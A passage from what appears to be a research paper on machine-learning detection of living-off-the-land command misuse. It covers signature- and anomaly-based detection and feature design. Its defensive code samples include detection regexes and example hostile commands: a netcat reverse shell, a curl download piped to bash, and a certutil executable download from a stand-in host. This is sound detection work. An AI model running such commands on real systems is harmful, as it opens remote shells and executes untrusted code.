tem fails.
Because a large-scale LotL dataset is hard to obtain, we had to build our own corpus in order to train and test the models. We describe the process we used and list the open-source repositories from which we collected malicious examples. Everything described in this paper is freely available as an open-source repository (link provided in Section 6) and as a PIP package with pre-trained models (lolc). However, we are unable to share the corpus itself, because the benign examples could contain sensitive information. Instead, we offer insights into our data and tag distribution (Section 5).
2 RELATED WORK
Whether or not we are concerned with LotL detection, intrusion detection systems fall into two main categories: (a) Signature-Based (SB) and (b) Anomaly-Based (AB).
Signature-Based detection relies on identifying patterns of commands that were previously observed to have been misused in other attacks (Modi et al., 2013). A higher number of rules yields higher accuracy. However, SB detection generalizes poorly to new attack methods and, to our knowledge, the most efficient way to automatically catch new attack methods and generate rules for them is through the use of honeypots (Kreibich and Crowcroft, 2004). Honeypots come with their own advantages and drawbacks, which we will not discuss here, except to note that, in time, attackers learn how to detect and avoid them.
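To make the idea concrete, here is a minimal sketch of signature matching over command lines; the two rules are hypothetical examples made up for illustration, not taken from any cited or production rule set:

    import re

    # Hypothetical signature rules: each maps a rule name to a regex that
    # matches command lines previously observed in attacks. Production rule
    # sets are far larger and more nuanced.
    SIGNATURES = {
        "certutil-download": re.compile(r"certutil(\.exe)?\s.*-urlcache\s.*http", re.I),
        "base64-pipe-to-shell": re.compile(r"base64\s+(-d|--decode).*\|\s*(ba)?sh"),
    }

    def match_signatures(command_line):
        """Return the names of all signature rules the command line triggers."""
        return [name for name, rx in SIGNATURES.items() if rx.search(command_line)]

    print(match_signatures("certutil.exe -urlcache -split -f http://x.example/p.exe"))
    # -> ['certutil-download']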
Anomaly-Based detection relies on modeling, usually through statistics, what can be regarded as normal operation, and on alerting whenever a system or application falls outside that normal behaviour (Boros et al., 2021; Butun et al., 2013; Lee et al., 1999; Silveira and Diot, 2010)¹.
AB systems can either rely on directly modeling a monitored system or on computing the model from a preexisting dataset (Durst et al., 1999), though the latter would normally fall into the supervised learning class rather than the unsupervised (anomaly-based) class. While all AB systems are better at adapting to and detecting new attack methods, purely unsupervised methods usually yield a higher number of false positives than their supervised counterparts. On the other hand, supervised methods are better at avoiding false alerts,
but they are only as good as the labeled data they are trained on, thus requiring periodic updates and higher maintenance.

¹ Some of the cited work refers to network-based anomaly detection. The basic ideas and principles still apply to LotL detection, but the volume of data is much lower.
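As a toy illustration of the AB idea, under the simplifying (and entirely hypothetical) assumption that "normal" can be captured by how often each program is invoked:

    from collections import Counter

    class FrequencyAnomalyDetector:
        """Toy anomaly detector: learns how often each program is invoked in
        benign traffic and flags command lines whose program is rare or unseen."""

        def __init__(self, threshold=0.01):
            self.counts = Counter()
            self.total = 0
            self.threshold = threshold  # minimum relative frequency considered normal

        def fit(self, benign_command_lines):
            for cmd in benign_command_lines:
                self.counts[cmd.split()[0]] += 1
                self.total += 1

        def is_anomalous(self, command_line):
            freq = self.counts[command_line.split()[0]] / self.total
            return freq < self.threshold

    detector = FrequencyAnomalyDetector()
    detector.fit(["ls -la", "grep -r foo /etc", "ls /tmp"] * 40)
    print(detector.is_anomalous("nc -e /bin/sh 10.0.0.1 4444"))  # True: 'nc' unseen

Real AB systems model far richer behaviour (sequences, arguments, timing), but the trade-off is the same: anything sufficiently rare is flagged, whether malicious or not.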
Notice: This research focuses only on the misuse of LotL binaries and tools. It might seem obvious to most security experts, but we are going to say it anyway: relying on just one type of detection, including LotL detection, is not effective from a security standpoint. Only by combining signature-based detection, anomaly-based detection, network profiling, obfuscation detection, system auditing, and all the other well-established methods into a Defense-in-Depth approach can one obtain a decent level of security and safety.
3 PROPOSED METHODOLOGY
Our methodology can be classified as a special case of signature-based intrusion detection that employs machine learning for modeling. There are two main ML-related issues we need to take into consideration:
(a) Data Sparsity: A naive approach would be to rely on n-gram features that can be easily extracted from the command lines in the dataset; this is probably one of the most common approaches to applying ML to text data. However, it results in a very rich feature set, which in turn generates data sparsity and enables the model to quickly overfit the dataset and generalize poorly on previously unseen examples, as the sketch below illustrates.
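A back-of-the-envelope illustration (the command lines are made up): even a handful of commands already produces a large character-trigram vocabulary, and most trigrams occur only once:

    from collections import Counter

    def char_ngrams(text, n=3):
        """All overlapping character n-grams of a string."""
        return [text[i:i + n] for i in range(len(text) - n + 1)]

    commands = [
        "powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA",
        "curl -s http://x.example/a.sh | bash",
        "tar -czf /tmp/backup.tgz /etc",
    ]

    counts = Counter(g for cmd in commands for g in char_ngrams(cmd))
    print(len(counts))                                # roughly 100 distinct trigrams
    print(sum(1 for c in counts.values() if c == 1))  # most of them occur only once

With thousands of command lines, such a vocabulary grows into the tens of thousands of mostly singleton features, which is exactly the sparsity problem described above.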
(b) False Positives: Given the skewed nature of real-life data², there is always a “power-struggle” between precision (how many of the examples that are marked as malicious are actually labeled correctly) and recall (how many of the malicious examples from the overall mass are actually identified). This is best captured by metrics designed for skewed datasets, such as the F-score.
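For reference, with TP, FP and FN denoting true positives, false positives and false negatives respectively, the three quantities are:

    \mathrm{Precision} = \frac{TP}{TP + FP}, \qquad
    \mathrm{Recall} = \frac{TP}{TP + FN}, \qquad
    F_1 = \frac{2 \cdot \mathrm{Precision} \cdot \mathrm{Recall}}{\mathrm{Precision} + \mathrm{Recall}}

The harmonic mean in F1 penalizes a classifier that trades one quantity for the other, which is why it is informative on skewed data where raw accuracy is not.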
In order to mitigate data sparsity, we used a feature-extraction scheme that is mostly manually designed and incorporates substantial human-expert knowledge. This keeps the feature set to a manageable size and focuses on features that weigh heavily in the classifier's decision (as opposed to automatically extracted features, such as n-grams, which would probably introduce a lot of useless information); a sketch of what such hand-crafted features could look like is given below.
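As a rough sketch of a hand-crafted feature set (the concrete features and the LOLBin shortlist below are illustrative stand-ins, not the actual expert-designed features used in this work):

    import re

    # Hypothetical shortlist of living-off-the-land binaries, for illustration only.
    LOLBINS = {"certutil", "mshta", "rundll32", "nc", "wget"}

    def extract_features(cmd):
        """Map a raw command line to a small, fixed-size feature dictionary."""
        tokens = cmd.split()
        program = tokens[0].rsplit("/", 1)[-1].lower() if tokens else ""
        return {
            "length": len(cmd),
            "num_flags": sum(t.startswith("-") for t in tokens),
            "has_url": bool(re.search(r"https?://", cmd)),
            "has_base64_like_token": any(
                len(t) >= 24 and re.fullmatch(r"[A-Za-z0-9+/=]+", t) for t in tokens
            ),
            "is_known_lolbin": program in LOLBINS,
        }

    print(extract_features("certutil -urlcache -split -f http://x.example/p.exe p.exe"))

A downstream classifier then operates on these few low-dimensional, expert-chosen signals instead of tens of thousands of sparse n-gram counts.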
To address false positives, we manually compiled our dataset and used a very high ratio of benign to malign examples. We also repeatedly tweaked our feature-extraction scheme and retrained our classifier until we obtained a high F-score, with the following observations:
² In a standard and relatively secure environment, most of the collected data will probably be benign rather than malicious.